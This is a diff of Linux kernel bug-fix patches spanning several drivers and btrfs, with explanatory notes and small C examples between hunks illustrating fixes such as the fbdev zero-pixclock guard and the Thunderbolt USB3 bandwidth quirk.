+-		 * on/off itself, in this case we report KEY_TOUCHPAD_ON/_OFF.
+-		 * If the EC did not toggle, report KEY_TOUCHPAD_TOGGLE.
+-		 */
+-		if (value != priv->r_touchpad_val) {
+-			ideapad_input_report(priv, value ? 67 : 66);
+-			sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+-		} else {
+-			ideapad_input_report(priv, 68);
+-		}
++	/*
++	 * On older models the EC controls the touchpad and toggles it on/off
++	 * itself; in this case we report KEY_TOUCHPAD_ON/_OFF. Some models do
++	 * an acpi-notify with VPC bit 5 set on resume, so this function gets
++	 * called with send_events=true on every resume. Therefore, if the EC did
++	 * not toggle, do nothing to avoid sending spurious KEY_TOUCHPAD_TOGGLE.
++	 */
++	if (send_events && value != priv->r_touchpad_val) {
++		ideapad_input_report(priv, value ? 67 : 66);
++		sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+ 	}
+ 
+ 	priv->r_touchpad_val = value;
+diff --git a/drivers/platform/x86/intel/pmc/core.c b/drivers/platform/x86/intel/pmc/core.c
+index 3a15d32d7644c..b9591969e0fa1 100644
+--- a/drivers/platform/x86/intel/pmc/core.c
++++ b/drivers/platform/x86/intel/pmc/core.c
+@@ -66,7 +66,18 @@ static inline void pmc_core_reg_write(struct pmc_dev *pmcdev, int reg_offset,
+ 
+ static inline u64 pmc_core_adjust_slp_s0_step(struct pmc_dev *pmcdev, u32 value)
+ {
+-	return (u64)value * pmcdev->map->slp_s0_res_counter_step;
++	/*
++	 * ADL PCH does not have the SLP_S0 counter and LPM Residency counters are
++	 * used as a workaround which uses 30.5 usec tick. All other client
++	 * programs have the legacy SLP_S0 residency counter that is using the 122
++	 * usec tick.
++	 */
++	const int lpm_adj_x2 = pmcdev->map->lpm_res_counter_step_x2;
++
++	if (pmcdev->map == &adl_reg_map)
++		return (u64)value * GET_X2_COUNTER((u64)lpm_adj_x2);
++	else
++		return (u64)value * pmcdev->map->slp_s0_res_counter_step;
+ }
+ 
+ static int set_etr3(struct pmc_dev *pmcdev)
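
Per the comment above, the LPM counters tick every 30.5 usec while the legacy SLP_S0 counter ticks every 122 usec; storing the LPM tick doubled (the _x2 convention) keeps the math integral. A worked example, assuming the x2 value is 61 and that the halving is folded into the conversion:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    uint64_t raw = 1001;                   /* an odd raw count */
    uint64_t adl_us    = raw * 61 / 2;     /* 30530 us: 30.5 us per tick,
                                              multiply first, halve last */
    uint64_t legacy_us = raw * 122;        /* 122122 us: 122 us per tick */
    printf("adl=%llu legacy=%llu\n",
           (unsigned long long)adl_us, (unsigned long long)legacy_us);
    return 0;
}
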
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index a01a92769c1a3..74af3e593b2ca 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -941,12 +941,23 @@ static ssize_t possible_values_show(struct kobject *kobj, struct kobj_attribute
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+ 
+-	if (!tlmi_priv.can_get_bios_selections)
+-		return -EOPNOTSUPP;
+-
+ 	return sysfs_emit(buf, "%s\n", setting->possible_values);
+ }
+ 
++static ssize_t type_show(struct kobject *kobj, struct kobj_attribute *attr,
++		char *buf)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	if (setting->possible_values) {
++		/* Figure out what setting type is as BIOS does not return this */
++		if (strchr(setting->possible_values, ';'))
++			return sysfs_emit(buf, "enumeration\n");
++	}
++	/* Anything else is going to be a string */
++	return sysfs_emit(buf, "string\n");
++}
++
+ static ssize_t current_value_store(struct kobject *kobj,
+ 		struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+@@ -1036,14 +1047,30 @@ static struct kobj_attribute attr_possible_values = __ATTR_RO(possible_values);
+ 
+ static struct kobj_attribute attr_current_val = __ATTR_RW_MODE(current_value, 0600);
+ 
++static struct kobj_attribute attr_type = __ATTR_RO(type);
++
++static umode_t attr_is_visible(struct kobject *kobj,
++					     struct attribute *attr, int n)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	/* We don't want to display possible_values attributes if not available */
++	if ((attr == &attr_possible_values.attr) && (!setting->possible_values))
++		return 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *tlmi_attrs[] = {
+ 	&attr_displ_name.attr,
+ 	&attr_current_val.attr,
+ 	&attr_possible_values.attr,
++	&attr_type.attr,
+ 	NULL
+ };
+ 
+ static const struct attribute_group tlmi_attr_group = {
++	.is_visible = attr_is_visible,
+ 	.attrs = tlmi_attrs,
+ };
+ 
+@@ -1423,7 +1450,34 @@ static int tlmi_analyze(void)
+ 			if (ret || !setting->possible_values)
+ 				pr_info("Error retrieving possible values for %d : %s\n",
+ 						i, setting->display_name);
++		} else {
++			/*
++			 * Older Thinkstations don't support the bios_selections API.
++			 * Instead they store this as an [Optional:Option1,Option2] section of the
++			 * name string.
++			 * Try to pull that out if it's available.
++			 */
++			char *item, *optstart, *optend;
++
++			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(item, "[Optional:");
++				if (optstart) {
++					optstart += strlen("[Optional:");
++					optend = strstr(optstart, "]");
++					if (optend)
++						setting->possible_values =
++							kstrndup(optstart, optend - optstart,
++									GFP_KERNEL);
++				}
++			}
+ 		}
++		/*
++		 * firmware-attributes requires that possible_values are separated by ';' but
++		 * Lenovo FW uses ','. Replace appropriately.
++		 */
++		if (setting->possible_values)
++			strreplace(setting->possible_values, ',', ';');
++
+ 		kobject_init(&setting->kobj, &tlmi_attr_setting_ktype);
+ 		tlmi_priv.setting[i] = setting;
+ 		kfree(item);
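
A userspace sketch of the fallback parsing added above: extract the list from a "[Optional:...]" section and convert Lenovo's ',' separator to the ';' expected by the firmware-attributes class (sample input invented):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

static char *parse_optional(const char *item)
{
    const char *start = strstr(item, "[Optional:");
    const char *end;
    char *vals, *p;

    if (!start)
        return NULL;
    start += strlen("[Optional:");
    end = strchr(start, ']');
    if (!end)
        return NULL;
    vals = strndup(start, end - start);
    if (vals)
        for (p = vals; *p; p++)   /* models strreplace(vals, ',', ';') */
            if (*p == ',')
                *p = ';';
    return vals;
}

int main(void)
{
    char *v = parse_optional("WakeOnLAN,[Optional:Enable,Disable]");
    printf("%s\n", v ? v : "(none)");   /* prints "Enable;Disable" */
    free(v);
    return 0;
}
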
+diff --git a/drivers/ptp/ptp_qoriq.c b/drivers/ptp/ptp_qoriq.c
+index 08f4cf0ad9e3c..8fa9772acf79b 100644
+--- a/drivers/ptp/ptp_qoriq.c
++++ b/drivers/ptp/ptp_qoriq.c
+@@ -601,7 +601,7 @@ static int ptp_qoriq_probe(struct platform_device *dev)
+ 	return 0;
+ 
+ no_clock:
+-	iounmap(ptp_qoriq->base);
++	iounmap(base);
+ no_ioremap:
+ 	release_resource(ptp_qoriq->rsrc);
+ no_resource:
+diff --git a/drivers/regulator/fixed.c b/drivers/regulator/fixed.c
+index 2a9867abba20c..e6724a229d237 100644
+--- a/drivers/regulator/fixed.c
++++ b/drivers/regulator/fixed.c
+@@ -215,7 +215,7 @@ static int reg_fixed_voltage_probe(struct platform_device *pdev)
+ 		drvdata->enable_clock = devm_clk_get(dev, NULL);
+ 		if (IS_ERR(drvdata->enable_clock)) {
+ 			dev_err(dev, "Can't get enable-clock from devicetree\n");
+-			return -ENOENT;
++			return PTR_ERR(drvdata->enable_clock);
+ 		}
+ 	} else if (drvtype && drvtype->has_performance_state) {
+ 		drvdata->desc.ops = &fixed_voltage_domain_ops;
+diff --git a/drivers/s390/crypto/vfio_ap_drv.c b/drivers/s390/crypto/vfio_ap_drv.c
+index 997b524bdd2b5..a48c6938ae68f 100644
+--- a/drivers/s390/crypto/vfio_ap_drv.c
++++ b/drivers/s390/crypto/vfio_ap_drv.c
+@@ -54,8 +54,9 @@ static struct ap_driver vfio_ap_drv = {
+ 
+ static void vfio_ap_matrix_dev_release(struct device *dev)
+ {
+-	struct ap_matrix_dev *matrix_dev = dev_get_drvdata(dev);
++	struct ap_matrix_dev *matrix_dev;
+ 
++	matrix_dev = container_of(dev, struct ap_matrix_dev, device);
+ 	kfree(matrix_dev);
+ }
+ 
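
Using container_of() on the embedded struct device is reliable even when drvdata has already been cleared during teardown. A self-contained illustration of the pattern:

#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct device { int dummy; };
struct matrix_dev { int id; struct device device; };

/* Recover the enclosing structure from the embedded member by address
 * arithmetic, as the release callback above now does. */
static void release(struct device *dev)
{
    struct matrix_dev *m = container_of(dev, struct matrix_dev, device);
    printf("releasing matrix_dev %d\n", m->id);
    free(m);
}

int main(void)
{
    struct matrix_dev *m = malloc(sizeof(*m));
    m->id = 42;
    release(&m->device);
    return 0;
}
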
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.c b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+index fe70f8f114352..5f746b4a6b8da 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+@@ -4768,7 +4768,7 @@ int megasas_task_abort_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"task abort issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+@@ -4838,7 +4838,7 @@ int megasas_reset_target_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"target reset issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 2ee9ea57554d7..14ae0a9c5d3d8 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -6616,11 +6616,6 @@ _base_allocate_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 	else if (rc == -EAGAIN)
+ 		goto try_32bit_dma;
+ 	total_sz += sense_sz;
+-	ioc_info(ioc,
+-	    "sense pool(0x%p)- dma(0x%llx): depth(%d),"
+-	    "element_size(%d), pool_size(%d kB)\n",
+-	    ioc->sense, (unsigned long long)ioc->sense_dma, ioc->scsiio_depth,
+-	    SCSI_SENSE_BUFFERSIZE, sz / 1024);
+ 	/* reply pool, 4 byte align */
+ 	sz = ioc->reply_free_queue_depth * ioc->reply_sz;
+ 	rc = _base_allocate_reply_pool(ioc, sz);
+diff --git a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+index acc11ad569758..cb8980238e8fc 100644
+--- a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
++++ b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+@@ -181,7 +181,6 @@ static int sys_set_trip_temp(struct thermal_zone_device *tzd, int trip, int temp
+ 		cancel_delayed_work_sync(&pci_info->work);
+ 		proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_INT_ENABLE_0, 0);
+ 		proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_THRES_0, 0);
+-		thermal_zone_device_disable(tzd);
+ 		pci_info->stored_thres = 0;
+ 		return 0;
+ 	}
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index ae28a03fa890b..1157b8869bcca 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -26,6 +26,19 @@ static void quirk_clx_disable(struct tb_switch *sw)
+ 	tb_sw_dbg(sw, "disabling CL states\n");
+ }
+ 
++static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
++{
++	struct tb_port *port;
++
++	tb_switch_for_each_port(sw, port) {
++		if (!tb_port_is_usb3_down(port))
++			continue;
++		port->max_bw = 16376;
++		tb_port_dbg(port, "USB3 maximum bandwidth limited to %u Mb/s\n",
++			    port->max_bw);
++	}
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -43,6 +56,24 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * Limit the maximum USB3 bandwidth for the following Intel USB4
++	 * host routers due to a hardware issue.
++	 */
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_M_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index e11d973a8f9b6..f034723b1b40e 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -252,6 +252,8 @@ struct tb_switch {
+  * @ctl_credits: Buffers reserved for control path
+  * @dma_credits: Number of credits allocated for DMA tunneling for all
+  *		 DMA paths through this port.
++ * @max_bw: Maximum possible bandwidth through this adapter if set to
++ *	    non-zero.
+  *
+  * In USB4 terminology this structure represents an adapter (protocol or
+  * lane adapter).
+@@ -277,6 +279,7 @@ struct tb_port {
+ 	unsigned int total_credits;
+ 	unsigned int ctl_credits;
+ 	unsigned int dma_credits;
++	unsigned int max_bw;
+ };
+ 
+ /**
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index d5cd219ee9e6b..3a11b30b6c86a 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1882,6 +1882,15 @@ int usb4_port_retimer_nvm_read(struct tb_port *port, u8 index,
+ 				usb4_port_retimer_nvm_read_block, &info);
+ }
+ 
++static inline unsigned int
++usb4_usb3_port_max_bandwidth(const struct tb_port *port, unsigned int bw)
++{
++	/* Take the possible bandwidth limitation into account */
++	if (port->max_bw)
++		return min(bw, port->max_bw);
++	return bw;
++}
++
+ /**
+  * usb4_usb3_port_max_link_rate() - Maximum support USB3 link rate
+  * @port: USB3 adapter port
+@@ -1903,7 +1912,9 @@ int usb4_usb3_port_max_link_rate(struct tb_port *port)
+ 		return ret;
+ 
+ 	lr = (val & ADP_USB3_CS_4_MSLR_MASK) >> ADP_USB3_CS_4_MSLR_SHIFT;
+-	return lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ /**
+@@ -1930,7 +1941,9 @@ int usb4_usb3_port_actual_link_rate(struct tb_port *port)
+ 		return 0;
+ 
+ 	lr = val & ADP_USB3_CS_4_ALR_MASK;
+-	return lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ static int usb4_usb3_port_cm_request(struct tb_port *port, bool request)
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 8cbbb002fefe0..086b509689839 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1039,9 +1039,8 @@ static struct fwnode_handle *ucsi_find_fwnode(struct ucsi_connector *con)
+ 	return NULL;
+ }
+ 
+-static int ucsi_register_port(struct ucsi *ucsi, int index)
++static int ucsi_register_port(struct ucsi *ucsi, struct ucsi_connector *con)
+ {
+-	struct ucsi_connector *con = &ucsi->connector[index];
+ 	struct typec_capability *cap = &con->typec_cap;
+ 	enum typec_accessory *accessory = cap->accessory;
+ 	enum usb_role u_role = USB_ROLE_NONE;
+@@ -1062,7 +1061,6 @@ static int ucsi_register_port(struct ucsi *ucsi, int index)
+ 	init_completion(&con->complete);
+ 	mutex_init(&con->lock);
+ 	INIT_LIST_HEAD(&con->partner_tasks);
+-	con->num = index + 1;
+ 	con->ucsi = ucsi;
+ 
+ 	cap->fwnode = ucsi_find_fwnode(con);
+@@ -1204,7 +1202,7 @@ out_unlock:
+  */
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+-	struct ucsi_connector *con;
++	struct ucsi_connector *con, *connector;
+ 	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+@@ -1235,16 +1233,16 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Allocate the connectors. Released in ucsi_unregister() */
+-	ucsi->connector = kcalloc(ucsi->cap.num_connectors + 1,
+-				  sizeof(*ucsi->connector), GFP_KERNEL);
+-	if (!ucsi->connector) {
++	connector = kcalloc(ucsi->cap.num_connectors + 1, sizeof(*connector), GFP_KERNEL);
++	if (!connector) {
+ 		ret = -ENOMEM;
+ 		goto err_reset;
+ 	}
+ 
+ 	/* Register all connectors */
+ 	for (i = 0; i < ucsi->cap.num_connectors; i++) {
+-		ret = ucsi_register_port(ucsi, i);
++		connector[i].num = i + 1;
++		ret = ucsi_register_port(ucsi, &connector[i]);
+ 		if (ret)
+ 			goto err_unregister;
+ 	}
+@@ -1256,11 +1254,12 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->connector = connector;
+ 	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+-	for (con = ucsi->connector; con->port; con++) {
++	for (con = connector; con->port; con++) {
+ 		ucsi_unregister_partner(con);
+ 		ucsi_unregister_altmodes(con, UCSI_RECIPIENT_CON);
+ 		ucsi_unregister_port_psy(con);
+@@ -1269,10 +1268,7 @@ err_unregister:
+ 		typec_unregister_port(con->port);
+ 		con->port = NULL;
+ 	}
+-
+-	kfree(ucsi->connector);
+-	ucsi->connector = NULL;
+-
++	kfree(connector);
+ err_reset:
+ 	memset(&ucsi->cap, 0, sizeof(ucsi->cap));
+ 	ucsi_reset_ppm(ucsi);
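
The connector array is now built behind a local pointer and assigned to ucsi->connector only after every port has registered, so nothing can observe a half-initialized table through the shared field. A simplified model of that publish-last ordering (locking and memory barriers omitted):

#include <stdio.h>
#include <stdlib.h>

struct conn { int num; };
struct ucsi { struct conn *connector; };

static int init_conns(struct ucsi *u, int n)
{
    struct conn *c = calloc(n + 1, sizeof(*c));
    if (!c)
        return -1;
    for (int i = 0; i < n; i++)
        c[i].num = i + 1;          /* register each connector */
    u->connector = c;              /* publish only after full success */
    return 0;
}

int main(void)
{
    struct ucsi u = { 0 };
    if (!init_conns(&u, 3))
        printf("first connector: %d\n", u.connector[0].num);
    free(u.connector);
    return 0;
}
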
+diff --git a/drivers/video/fbdev/au1200fb.c b/drivers/video/fbdev/au1200fb.c
+index 81c3154544287..b6b22fa4a8a01 100644
+--- a/drivers/video/fbdev/au1200fb.c
++++ b/drivers/video/fbdev/au1200fb.c
+@@ -1040,6 +1040,9 @@ static int au1200fb_fb_check_var(struct fb_var_screeninfo *var,
+ 	u32 pixclock;
+ 	int screen_size, plane;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	plane = fbdev->plane;
+ 
+ 	/* Make sure that the mode respect all LCD controller and
+diff --git a/drivers/video/fbdev/geode/lxfb_core.c b/drivers/video/fbdev/geode/lxfb_core.c
+index 8130e9eee2b4b..556d8b1a9e06a 100644
+--- a/drivers/video/fbdev/geode/lxfb_core.c
++++ b/drivers/video/fbdev/geode/lxfb_core.c
+@@ -235,6 +235,9 @@ static void get_modedb(struct fb_videomode **modedb, unsigned int *size)
+ 
+ static int lxfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (var->xres > 1920 || var->yres > 1440)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/video/fbdev/intelfb/intelfbdrv.c b/drivers/video/fbdev/intelfb/intelfbdrv.c
+index 0a9e5067b2010..a81095b2b1ea5 100644
+--- a/drivers/video/fbdev/intelfb/intelfbdrv.c
++++ b/drivers/video/fbdev/intelfb/intelfbdrv.c
+@@ -1222,6 +1222,9 @@ static int intelfb_check_var(struct fb_var_screeninfo *var,
+ 
+ 	dinfo = GET_DINFO(info);
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	/* update the pitch */
+ 	if (intelfbhw_validate_mode(dinfo, var) != 0)
+ 		return -EINVAL;
+diff --git a/drivers/video/fbdev/nvidia/nvidia.c b/drivers/video/fbdev/nvidia/nvidia.c
+index e60a276b4855d..ea4ba3dfb96bb 100644
+--- a/drivers/video/fbdev/nvidia/nvidia.c
++++ b/drivers/video/fbdev/nvidia/nvidia.c
+@@ -764,6 +764,8 @@ static int nvidiafb_check_var(struct fb_var_screeninfo *var,
+ 	int pitch, err = 0;
+ 
+ 	NVTRACE_ENTER();
++	if (!var->pixclock)
++		return -EINVAL;
+ 
+ 	var->transp.offset = 0;
+ 	var->transp.length = 0;
+diff --git a/drivers/video/fbdev/tgafb.c b/drivers/video/fbdev/tgafb.c
+index 14d37c49633c6..b44004880f0d1 100644
+--- a/drivers/video/fbdev/tgafb.c
++++ b/drivers/video/fbdev/tgafb.c
+@@ -173,6 +173,9 @@ tgafb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
+ 	struct tga_par *par = (struct tga_par *)info->par;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (par->tga_type == TGA_TYPE_8PLANE) {
+ 		if (var->bits_per_pixel != 8)
+ 			return -EINVAL;
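
All five fbdev drivers above gain the same guard because pixclock is later used as a divisor when validating the mode; a zero value passed in from userspace would divide by zero. A minimal model of the guard (the kHz conversion is illustrative):

#include <stdio.h>

#define EINVAL 22

static int check_var(unsigned pixclock)
{
    if (!pixclock)
        return -EINVAL;
    /* pixclock is a period in picoseconds; frequency in kHz = 1e9 / ps */
    unsigned long khz = 1000000000UL / pixclock;
    printf("pixel clock ~%lu kHz\n", khz);
    return 0;
}

int main(void)
{
    printf("rc=%d\n", check_var(0));      /* rejected, no division */
    printf("rc=%d\n", check_var(39722));  /* ~25175 kHz, a 640x480 mode */
    return 0;
}
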
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 46851511b661b..0d7ae20e39c9a 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -1895,8 +1895,7 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 	ULIST_ITER_INIT(&uiter);
+ 	ctx->use_path_cache = true;
+ 	while (1) {
+-		bool is_shared;
+-		bool cached;
++		const unsigned long prev_ref_count = ctx->refs.nnodes;
+ 
+ 		walk_ctx.bytenr = bytenr;
+ 		ret = find_parent_nodes(&walk_ctx, &shared);
+@@ -1914,21 +1913,36 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 		ret = 0;
+ 
+ 		/*
+-		 * If our data extent was not directly shared (without multiple
+-		 * reference items), than it might have a single reference item
+-		 * with a count > 1 for the same offset, which means there are 2
+-		 * (or more) file extent items that point to the data extent -
+-		 * this happens when a file extent item needs to be split and
+-		 * then one item gets moved to another leaf due to a b+tree leaf
+-		 * split when inserting some item. In this case the file extent
+-		 * items may be located in different leaves and therefore some
+-		 * of the leaves may be referenced through shared subtrees while
+-		 * others are not. Since our extent buffer cache only works for
+-		 * a single path (by far the most common case and simpler to
+-		 * deal with), we can not use it if we have multiple leaves
+-		 * (which implies multiple paths).
++		 * More than one extent buffer (bytenr) may have been added to
++		 * the ctx->refs ulist, in which case we have to check multiple
++		 * tree paths in case the first one is not shared, so we can not
++		 * use the path cache which is made for a single path. Multiple
++		 * extent buffers at the current level happen when:
++		 *
++		 * 1) level -1, the data extent: If our data extent was not
++		 *    directly shared (without multiple reference items), then
++		 *    it might have a single reference item with a count > 1 for
++		 *    the same offset, which means there are 2 (or more) file
++		 *    extent items that point to the data extent - this happens
++		 *    when a file extent item needs to be split and then one
++		 *    item gets moved to another leaf due to a b+tree leaf split
++		 *    when inserting some item. In this case the file extent
++		 *    items may be located in different leaves and therefore
++		 *    some of the leaves may be referenced through shared
++		 *    subtrees while others are not. Since our extent buffer
++		 *    cache only works for a single path (by far the most common
++		 *    case and simpler to deal with), we can not use it if we
++		 *    have multiple leaves (which implies multiple paths).
++		 *
++		 * 2) level >= 0, a tree node/leaf: We can have a mix of direct
++		 *    and indirect references on a b+tree node/leaf, so we have
++		 *    to check multiple paths, and the extent buffer (the
++		 *    current bytenr) may be shared or not. One example is
++		 *    during relocation as we may get a shared tree block ref
++		 *    (direct ref) and a non-shared tree block ref (indirect
++		 *    ref) for the same node/leaf.
+ 		 */
+-		if (level == -1 && ctx->refs.nnodes > 1)
++		if ((ctx->refs.nnodes - prev_ref_count) > 1)
+ 			ctx->use_path_cache = false;
+ 
+ 		if (level >= 0)
+@@ -1938,18 +1952,45 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 		if (!node)
+ 			break;
+ 		bytenr = node->val;
+-		level++;
+-		cached = lookup_backref_shared_cache(ctx, root, bytenr, level,
+-						     &is_shared);
+-		if (cached) {
+-			ret = (is_shared ? 1 : 0);
+-			break;
++		if (ctx->use_path_cache) {
++			bool is_shared;
++			bool cached;
++
++			level++;
++			cached = lookup_backref_shared_cache(ctx, root, bytenr,
++							     level, &is_shared);
++			if (cached) {
++				ret = (is_shared ? 1 : 0);
++				break;
++			}
+ 		}
+ 		shared.share_count = 0;
+ 		shared.have_delayed_delete_refs = false;
+ 		cond_resched();
+ 	}
+ 
++	/*
++	 * If the path cache is disabled, then it means at some tree level we
++	 * got multiple parents due to a mix of direct and indirect backrefs or
++	 * multiple leaves with file extent items pointing to the same data
++	 * extent. We have to invalidate the cache and cache only the sharedness
++	 * result for the levels where we got only one node/reference.
++	 */
++	if (!ctx->use_path_cache) {
++		int i = 0;
++
++		level--;
++		if (ret >= 0 && level >= 0) {
++			bytenr = ctx->path_cache_entries[level].bytenr;
++			ctx->use_path_cache = true;
++			store_backref_shared_cache(ctx, root, bytenr, level, ret);
++			i = level + 1;
++		}
++
++		for ( ; i < BTRFS_MAX_LEVEL; i++)
++			ctx->path_cache_entries[i].bytenr = 0;
++	}
++
+ 	/*
+ 	 * Cache the sharedness result for the data extent if we know our inode
+ 	 * has more than 1 file extent item that refers to the data extent.
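
The reworked loop compares ctx->refs.nnodes against its value before each level's walk, so any level that adds more than one reference disables the single-path cache, not just the data-extent level. A toy model of that delta check:

#include <stdio.h>

int main(void)
{
    unsigned long nnodes = 0;
    int use_path_cache = 1;
    unsigned added_per_level[] = { 1, 1, 2, 1 };  /* fan-out at one level */

    for (unsigned i = 0; i < 4; i++) {
        unsigned long prev = nnodes;    /* models prev_ref_count */
        nnodes += added_per_level[i];
        if (nnodes - prev > 1)
            use_path_cache = 0;         /* multiple parents: cache unusable */
    }
    printf("use_path_cache=%d\n", use_path_cache);  /* 0 */
    return 0;
}
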
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index d628d545ffea7..c70a888bf8bf6 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1036,14 +1036,8 @@ int btrfs_remove_block_group(struct btrfs_trans_handle *trans,
+ 			< block_group->zone_unusable);
+ 		WARN_ON(block_group->space_info->disk_total
+ 			< block_group->length * factor);
+-		WARN_ON(test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE,
+-				 &block_group->runtime_flags) &&
+-			block_group->space_info->active_total_bytes
+-			< block_group->length);
+ 	}
+ 	block_group->space_info->total_bytes -= block_group->length;
+-	if (test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags))
+-		block_group->space_info->active_total_bytes -= block_group->length;
+ 	block_group->space_info->bytes_readonly -=
+ 		(block_group->length - block_group->zone_unusable);
+ 	block_group->space_info->bytes_zone_unusable -=
+@@ -3342,13 +3336,15 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 	spin_unlock(&info->delalloc_root_lock);
+ 
+ 	while (total) {
+-		bool reclaim;
++		struct btrfs_space_info *space_info;
++		bool reclaim = false;
+ 
+ 		cache = btrfs_lookup_block_group(info, bytenr);
